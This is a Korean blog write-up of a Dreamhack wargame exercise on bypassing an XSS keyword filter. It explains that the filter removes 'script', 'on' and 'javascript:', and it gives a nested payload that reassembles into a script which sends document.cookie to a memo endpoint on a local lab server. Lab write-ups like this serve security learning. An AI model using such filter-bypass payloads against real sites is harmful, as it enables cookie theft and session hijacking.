반응형
문제설명
Exercise: XSS Filtering Bypass에서 실습하는 문제입니다.
코드분석은 XSS-1과 XSS-2를 참고해주세요
취약점 분석

- XSS-1과 XSS-2와 다르게 특정 문구가 필터링된 모습
- script, on, javascript: 문구가 있을 시 "" 공백으로 바꿈
위와 같이 특정 문구만 필터링하면 우회하여 xss 공격 가능함
익스플로잇
http://127.0.0.1:8000/vuln?param=<scronipt>locatioonn.href="/memo?memo=" + document.cookie</scronipt>
- 위와 같이 페이로드를 작성하면 on 문자열이 "" 됨
http://127.0.0.1:8000/vuln?param=<script>location.href="/memo?memo=" + document.cookie</script>
- 이런 문구가 완성되고 xss가 실행

반응형
'Dreamhack 워게임 > Lv.1' 카테고리의 다른 글
| simple_sqli chatgpt (0) | 2026.01.30 |
|---|---|
| CSRF Advacned (0) | 2026.01.23 |
| {"role": "admin"} (0) | 2026.01.21 |
| simple_sqli (1) | 2026.01.15 |
| csrf-2 (1) | 2026.01.11 |